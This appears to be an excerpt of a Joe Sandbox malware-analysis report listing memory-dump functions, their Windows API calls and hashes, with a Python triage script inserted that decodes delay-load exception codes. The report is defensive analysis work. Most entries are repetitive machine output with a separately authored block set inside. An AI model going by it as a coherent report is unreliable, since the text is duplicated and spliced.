• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: Find$FileFirst$CloseErrorLast
• String ID:
• API String ID: 1464966427-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _wcslen
• String ID:
• API String ID: 176396367-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetThreadExecutionState.KERNEL32(00000001), ref: 0032215D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: ExecutionStateThread
• String ID:
• API String ID: 2211380416-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GdipAlloc.GDIPLUS(00000010), ref: 0032B63C
  • Part of subcall function 0032B3C8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0032B3E9
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: Gdip$AllocBitmapCreateFromStream
• String ID:
• API String ID: 1915507550-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• DloadProtectSection.DELAYIMP ref: 0032F76F
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: DloadProtectSection
• String ID:
• API String ID: 2203082970-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00322E88), ref: 0032EEE2
  • Part of subcall function 0032C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0032C769
  • Part of subcall function 0032C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032C77A
  • Part of subcall function 0032C758: IsDialogMessageW.USER32(00020486,?), ref: 0032C78E
  • Part of subcall function 0032C758: TranslateMessage.USER32(?), ref: 0032C79C
  • Part of subcall function 0032C758: DispatchMessageW.USER32(?), ref: 0032C7A6
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: Message$DialogDispatchItemPeekSendTranslate
• String ID:
• API String ID: 897784432-0
                                                                                              • Opcode ID: cd68988fbace2e510b805655e4d3af6ef0f3c317f651e4b8a6879f28e727e4ca
                                                                                              • Instruction ID: e6e3cd85d1064244d313bb9381b3786116197b2af27fafcd1e7b6a9ba870347d
                                                                                              • Opcode Fuzzy Hash: cd68988fbace2e510b805655e4d3af6ef0f3c317f651e4b8a6879f28e727e4ca
                                                                                              • Instruction Fuzzy Hash: DBD09E71154700AED6132B51DE06F1E7AE6BF98B09F004554B249340B1C6A29D21AF02
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 4d4a6a22971671d7350263a7e4c19b17d0e9a4505c58d908d1f7ef80f7879bde
• Instruction ID: 506ea4687d97b37f3c0d61860a2878ad3455acb06df45a27658228ac402b5364
• Opcode Fuzzy Hash: 4d4a6a22971671d7350263a7e4c19b17d0e9a4505c58d908d1f7ef80f7879bde
• Instruction Fuzzy Hash: 77D0CA70414221CFD3A68F39E808782BBE4AF09310B22883E90C9C2220E6709880CF40
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileType.KERNELBASE(000000FF,0031AA1E), ref: 0031AB28
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: 02cf88980024112d1e553293e942678cd96a1a4c9dba321bf895609bde0bdb8e
• Instruction ID: 5a84563e77dbd9ba78c0667148085b8b6b48e7c4b9a004043dd04c4de71ae706
• Opcode Fuzzy Hash: 02cf88980024112d1e553293e942678cd96a1a4c9dba321bf895609bde0bdb8e
• Instruction Fuzzy Hash: BFC01234009545854E370A3498440D57623AA5A3677B5D396C065C90A1C3229CD3E502
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 6cf67656b82d50e3d0e09cf7e523ef2dcf558c14bf045e05326852a9d2262e74
• Instruction ID: 95c4827eb0145d612d68c782011107eeb7b466612c9ec7b0dc1d726238fb9b88
• Opcode Fuzzy Hash: 6cf67656b82d50e3d0e09cf7e523ef2dcf558c14bf045e05326852a9d2262e74
• Instruction Fuzzy Hash: 86B012AA2680137E365B91103C27D7603BCC0D0B21370803FF000C8040E4842C412071
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 49fe78dca8280ef0227d8a2d58987d426e98e69fe849c561575dc42ca94710d8
• Instruction ID: 2aee8b2f9d596bbb2e802f40d742a07564379db33cea95690b93e304c6f534ca
• Opcode Fuzzy Hash: 49fe78dca8280ef0227d8a2d58987d426e98e69fe849c561575dc42ca94710d8
• Instruction Fuzzy Hash: 1BB012AE2691127D368BD1143C23F3703BCC0C0B11374803FF004C8140D8801C411271
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 5abc12c0f4b4350f39873a69e87ad332c56933c394f52c466d4e0fbe40597455
• Instruction ID: c32be33d977e547fae81141a20c9ffc4dae945e7e372a3eed85c0e75d9568028
• Opcode Fuzzy Hash: 5abc12c0f4b4350f39873a69e87ad332c56933c394f52c466d4e0fbe40597455
• Instruction Fuzzy Hash: D5B012AE269212BD3ACBD1143C23F3702FCC0C0B11334813FF004C8540D8801C815171
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 8b8fb39863b15f2b1adb8bba00750fce94e839db77b2cad84ffed5499fc3c11c
• Instruction ID: fdd9838e24c4a07c3651a93f4477bd82b7423ffa445300c7c00b1d8954db061c
• Opcode Fuzzy Hash: 8b8fb39863b15f2b1adb8bba00750fce94e839db77b2cad84ffed5499fc3c11c
• Instruction Fuzzy Hash: B9B012AA2781127D368BD1187C23E3603BCC0C0B11370853FF004C8140D4801C411571
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 4036eeb6e0b2822f02374a1bee380231935300b07db223e3396365020d727bac
• Instruction ID: 4716c852a0b53262dc6379dc3312402f7ebfb608dcdfa247053e7d5548030401
• Opcode Fuzzy Hash: 4036eeb6e0b2822f02374a1bee380231935300b07db223e3396365020d727bac
• Instruction Fuzzy Hash: 86B012AE2691127D368BD1143C23F3B02BCC0C0B15334C03FF404C8140D8801C415171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
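The APIs listed for this group of functions are the MSVC delay-load runtime rather than anything specific to the sample: `___delayLoadHelper2@8` and `DloadReleaseSectionWriteAccess` come from delayimp, and the `RaiseException` call carries `C06D0057`, which is `VcppException(ERROR_SEVERITY_ERROR, ERROR_INVALID_PARAMETER)`, the code the helper raises when a delay-load descriptor lacks the `dlattrRva` attribute. As an added triage helper (not part of the Joe Sandbox report or its tooling), the Python below parses `RaiseException.KERNEL32(...)` lines in the format used on this page and decodes the first argument into severity, facility and Win32 error, then flags the codes that identify compiler-runtime boilerplate. The table of known codes is assembled from the MSVC runtime definitions (`VcppException` in delayimp.h, the `0xE06D7363` C++ exception tag, the `0x406D1388` thread-naming exception); the sample line is the one quoted above.

```python
import re

# VcppException(sev, err) = sev | (FACILITY_VISUALCPP << 16) | err   (delayimp.h)
FACILITY_VISUALCPP = 0x6D
ERROR_SEVERITY_ERROR = 0xC0000000
ERROR_INVALID_PARAMETER, ERROR_MOD_NOT_FOUND, ERROR_PROC_NOT_FOUND = 87, 126, 127


def vcpp_exception(win32_error, severity=ERROR_SEVERITY_ERROR):
    """Rebuild the VcppException() macro so the table below is derived, not typed."""
    return severity | (FACILITY_VISUALCPP << 16) | win32_error


# Exception codes that identify runtime/compiler boilerplate rather than sample logic.
KNOWN_CODES = {
    vcpp_exception(ERROR_INVALID_PARAMETER): "delay-load helper: descriptor lacks dlattrRva",
    vcpp_exception(ERROR_MOD_NOT_FOUND): "delay-load helper: delay-loaded DLL not found",
    vcpp_exception(ERROR_PROC_NOT_FOUND): "delay-load helper: delay-loaded export not found",
    0xE06D7363: "MSVC C++ exception ('msc' tag) from _CxxThrowException",
    0x406D1388: "MS_VC_EXCEPTION: SetThreadName() debugger thread-naming trick",
    0x80000003: "STATUS_BREAKPOINT (also used as an anti-debug probe)",
    0xC0000005: "STATUS_ACCESS_VIOLATION",
}

# Matches the report's "RaiseException.KERNEL32(code,flags,nargs,...)" rendering.
RAISE_RE = re.compile(
    r"RaiseException\.KERNEL32\(([0-9A-Fa-f]+),([0-9A-Fa-f]+),([0-9A-Fa-f]+),"
)


def decode_status(code):
    """Split an NTSTATUS-style exception code into its bit fields."""
    severity = ("success", "informational", "warning", "error")[code >> 30]
    return {
        "severity": severity,
        "customer": bool((code >> 29) & 1),   # customer bit: non-Microsoft code
        "facility": (code >> 16) & 0x0FFF,
        "code": code & 0xFFFF,
    }


def classify_raise(line):
    """Parse one report line; return a dict describing the RaiseException call, or None."""
    m = RAISE_RE.search(line)
    if not m:
        return None
    exc_code = int(m.group(1), 16)
    flags = int(m.group(2), 16)
    nargs = int(m.group(3), 16)

    info = decode_status(exc_code)
    info["exception_code"] = exc_code
    info["noncontinuable"] = bool(flags & 1)   # EXCEPTION_NONCONTINUABLE
    info["nargs"] = nargs

    if exc_code in KNOWN_CODES:
        info["meaning"] = KNOWN_CODES[exc_code]
    elif info["facility"] == FACILITY_VISUALCPP:
        info["meaning"] = "VcppException wrapping Win32 error %d" % info["code"]
    else:
        info["meaning"] = "unknown"

    # The three delay-load codes mean the function is the CRT helper, not sample logic.
    info["is_delayload_helper"] = (
        info["facility"] == FACILITY_VISUALCPP
        and info["code"] in (ERROR_INVALID_PARAMETER, ERROR_MOD_NOT_FOUND, ERROR_PROC_NOT_FOUND)
    )
    return info


if __name__ == "__main__":
    # Constructed input: the line as it appears in this report's APIs section.
    sample = "Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D"
    for key, value in classify_raise(sample).items():
        print("%-20s %s" % (key, hex(value) if key == "exception_code" else value))
```

Running it on the quoted line reports severity `error`, facility `0x6D` (FACILITY_VISUALCPP), Win32 error 87 and `is_delayload_helper = True`, which is the quick check that every function in this run of entries is the delay-load thunk path and can be skipped when hunting for the sample's own code.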
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ba905ba127acaafb8233f76bda7c4e7668723e615bd521e975bf7c2515125753
                                                                                              • Instruction ID: 8e1b60d0cbbc54fddb80387b926c51e7b52cc710d04439a8e2f236cf32a1db1c
                                                                                              • Opcode Fuzzy Hash: ba905ba127acaafb8233f76bda7c4e7668723e615bd521e975bf7c2515125753
                                                                                              • Instruction Fuzzy Hash: 0FB012E52A9620BF330B56153C13E3701ACC4C4B10330813BF004C9040D5805C840071
